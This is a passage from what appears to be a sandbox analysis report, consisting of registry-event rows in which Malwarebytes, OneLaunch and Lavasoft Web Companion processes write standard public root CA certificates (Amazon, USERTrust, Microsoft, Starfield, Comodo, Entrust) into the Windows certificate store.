| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob = 030000000100000014000000f6108407d6f8bb67980cc2e244c2ebae1cef63be2000000001000000f6010000308201f230820178a0030201020213066c9fd7c1bb104c2943e5717b7b2cc81ac10e300a06082a8648ce3d0403033039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412034301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120343076301006072a8648ce3d020106052b8104002203620004d2ab8a374fa3530dfec18a7b4ba87b464b63b062f62d1bdb087121d200e863bd9a27fbf0396e5dea3da5c981aaa35b2098455d16dbfde8106de39ce0e3bd5f8462f3706433a0cb242f70ba88a12aa075f881ae6206c481db396e29b01efa2e5ca3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414d3ecc73a656ecce1da769a56fb9cf3866d57e581300a06082a8648ce3d040303036800306502303a8b21f1bd7e11add0ef58962fd6eb9d7e908d2bcf6655c32ce328a9700a470ef0375912ff2d9994284e2a4f354d335a023100ea75004e3bc43a941291c958469d211372a7889c8ae44c4adb96d4ac8b6b6b49125333add7e4be24fcb50a76d4a5bc10 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 5c0000000100000004000000001000001900000001000000100000009f687581f7ef744ecfc12b9cee6238f10f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa2140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2040000000100000010000000be954f16012122448ca8bc279602acf52000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4 | C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob = 0300000001000000140000005a8cef45d7a69859767a8c8b4496b578cf474b1a2000000001000000450500003082054130820329a0030201020213066c9fd29635869f0a0fe58678f85b26bb8a37300d06092a864886f70d01010c05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412032301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203230820222300d06092a864886f70d01010105000382020f003082020a0282020100ad969f2d9c4a4c4a81795199ec8acb6b605113bc4d6d06fcb0088ddd19106ac7260c35d8c06f2084e994b19b8503c35bdb4ae8c8f89076d95b4fe34ce806364dcc9aac3d0c902b92d4061960ac374479858182ad5a37e00dcc9da64c5276ea439db704d150f655e0d5d2a64985e937e9ca7eae5c954d489a3fae205a6d8895d934b8521a4390b0bf6c05b9b678b7ead0e43a3c125362ff4af27bbe3505a91234e3f36474622c3d00495a28fe3244bb87dd652702713bda4af71fdacdf72155904f0fecae82e19f6bd945d3bbf05f87ed3c2c3986da3fdeec7255eb79a3addbdd7cb0ba1ccefcde4f3576cf0ff8781f6a36514627615be99ecff0a2557d7c258a6f2fb4c5cf842e2bfd0d51106cfb5f1bbc1b7ec5ae3b98013192ff0b57f49ab2b957e9abef0d76d1f0eef4ce86a7e06ee9b469a1df69f633c6692e97139ea587b057108137c953b3bb7ff692d19cd018f4926eda834fa663994ca5fb5eef21647a205f6c648515cb37e9620c0b2a16dc012e32da3e4bf59e3af6174094ef9e910886fabe63a85a33eccb744395f96c695236c7296ffc55035c1ffb9fbd47ebe74947950b4e89220949e0f5611ef1bf2e8a726e8059ff573af97532a34e5feced2862d94d73f2cc811760edcdebdcdba7cac57e02bdf2540854fdb42d092c17544a98d154e1516708d2ed6e7e6f3fd22d81592966cb903995111e7427feddebaf0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b00cf04c30f405580248fd33e552af4b84e36652300d06092a864886f70d01010c05000382020100aaa8808f0e78a3e0a2d4cde6f5987a3bea0003b0970e93bc5aa8f62c8c7287a9b1fc7f73fd637178a58759cf30e10d10b2135a6d82f56ae6809fa0050b68e4476bc76adfb6fd773272e518fa09f4a0932c5dd28c75857665900c0379b7312363ad788309866884cafff9cf269a9279e7cd4bc5e761a717cbf3a91293936ba7e82f5392c46058b0cc0251185b858d625963b6adb4de9afb26f70027c05d55377499c9507fe3592e44e32c25eeec4c3277b49f1ae94b5d20c5dafd1c8716c643e8d4bb269a45705ea90b3753e2467b27fde046f289b7cc42b6cb28266ed9a5c93ac8411360f7508c15aeb26d1a151a5778e6922ad96590823f6c02afae123a27963604d71da28063a99bf1e5bab47c14b04ec9b11f745f38f651ea9bfa2ca211d4a92d271a45b1afb24e710dc05846d66906cb53cbb3fe6b41cd417e7d4c0f7c72797a59cd5e4a0eac9ba99873797cb4f4ccb9b8070cb2745cb8c76f88a190a7f4aaf9bf673af41a15621eb79fbe3db129af67a112f25810195303301bb81a89f69cbd97038ea309f31d8b21f1b4dfe41cd19f650206ea5cd613b384efa2a55c8c7729a768c06bae40d2a8b4eacdf08d4b389c199a1b2854b88990efca75813e1ef26424c718af4eff479e07f63565a4d30a56fff517646cefa822254993b6df0017da587e5deec51bb0d1d15f2110c7f9f3ba020a2707c5f1d6c7d3e0fb09606c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 040000000100000010000000be954f16012122448ca8bc279602acf5140000000100000014000000c87ed26a852a1bca1998040727cf50104f68a8a2030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa20f000000010000003000000041ce925678dfe0ccaa8089263c242b897ca582089d14e5eb685fca967f36dbd334e97e81fd0e64815f851f914ade1a1e1900000001000000100000009f687581f7ef744ecfc12b9cee6238f12000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob = 0300000001000000140000008da7f965ec5efc37910f1c6e59fdc1cc6a6ede162000000001000000450300003082034130820229a0030201020213066c9fcf99bf8c0a39e2f0788a43e696365bca300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3135303532363030303030305a170d3338303131373030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203130820122300d06092a864886f70d01010105000382010f003082010a0282010100b2788071ca78d5e371af478050747d6ed8d78876f49968f7582160f97484012fac022d86d3a0437a4eb2a4d036ba01be8ddb48c80717364cf4ee8823c73eeb37f5b519f84968b0ded7b976381d619ea4fe8236a5e54a56e445e1f9fdb416fa74da9c9b35392ffab02050066c7ad080b2a6f9afec47198f503807dca2873958f8bad5a9f948673096ee94785e6f89a351c0308666a14566ba54eba3c391f948dcffd1e8302d7d2d747035d78824f79ec4596ebb738717f2324628b843fab71daacab4f29f240e2d4bf7715c5e69ffea9502cb388aae50386fdbfb2d621bc5c71e54e177e067c80f9c8723d63f40207f2080c4804c3e3b24268e04ae6c9ac8aa0d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604148418cc8534ecbc0c94942e08599cc7b2104e0a08300d06092a864886f70d01010b0500038201010098f2375a4190a11ac57651282036230eaee628bbaaf894ae48a4307f1bfc248d4bb4c8a197f6b6f17a70c85393cc0828e39825cf23a4f9de21d37c8509ad4e9a753ac20b6a897876444718656c8d418e3b7f9acbf4b5a750d7052c37e8034bade961a0026ef5f2f0c5b2ed5bb7dcfa945c779e13a57f52ad95f2f8933bde8b5c5bca5a525b60af14f74befa3fb9f40956d3154fc42d3c7461f23add90f48709ad9757871d1724334756e5759c2025c266029cf2319168e8843a5d4e4cb08fb231143e843297262a1a95d5e08d490aeb8d8ce14c2d055f286f6c49343776661c0b9e841d7977860036e4a72aea5d17dba109e866c1b8ab95933f8ebc490bef1b9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8CF427FD790C3AD166068DE81E57EFBB932272D4\Blob = 5c000000010000000400000000080000190000000100000010000000fa46ce7cbb85cfb4310075313a09ee050300000001000000140000008cf427fd790c3ad166068de81e57efbb932272d47e000000010000000800000000c001b39667d6011d0000000100000010000000521b5f4582c1dcaae381b05e37ca2d341400000001000000140000006a72267ad01eef7de73b6951d46c8d9f901266ab0b000000010000001800000045006e00740072007500730074002e006e0065007400000062000000010000002000000043df5774b03e7fef5fe40d931a7bedf1bb2e6b42738c4e6d3841103d3aa7f3397f000000010000002c000000302a060a2b0601040182370a030406082b0601050507030506082b0601050507030606082b06010505070307530000000100000041000000303f3020060a6086480186fa6c0a010230123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f0000000100000020000000fde5f2d9ce2026e1e10064c0a468c9f355b90acf85baf5ce6f52d4016837fd940400000001000000100000004be2c99196650cf40e5a9392a00afeb22000000001000000420400003082043e30820326a00302010202044a538c28300d06092a864886f70d01010b05003081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d204732301e170d3039303730373137323535345a170d3330313230373137353535345a3081be310b300906035504061302555331163014060355040a130d456e74727573742c20496e632e31283026060355040b131f536565207777772e656e74727573742e6e65742f6c6567616c2d7465726d7331393037060355040b1330286329203230303920456e74727573742c20496e632e202d20666f7220617574686f72697a656420757365206f6e6c793132303006035504031329456e747275737420526f6f742043657274696669636174696f6e20417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100ba84b672db9e0c6be299e93001a776ea32b895411ac9da614e5872cffef68279bf7361060aa527d8b35fd3454e1c72d64e32f2728a0ff78319d06a808000451eb0c7e79abf1257271ca3682f0a87bd6a6b0e5e65f31c77d5d4858d7021b4b332e78ba2d5863902b1b8d247cee4c949c43ba7defb547d57bef0e86ec279b23a0b55e250981632135c2f7856c1c294b3f25ae4279a9f24d7c6ecd09b2582e3ccc2c445c58c977a066b2a119fa90a6e483b6fdbd4111942f78f07bff5535f9c3ef4172ce669ac4e324c6277eab7e8e5bb34bc198bae9c51e7b77eb553b13322e56dcf703c1afae29b67b683f48da5af624c4de058ac64341203f8b68d946324a4710203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604146a72267ad01eef7de73b6951d46c8d9f901266ab300d06092a864886f70d01010b05000382010100799f1d96c6b6793f228d87d3870304606a6b9a2e59897311ac43d1f513ff8d392bc0f2bd4f708ca92f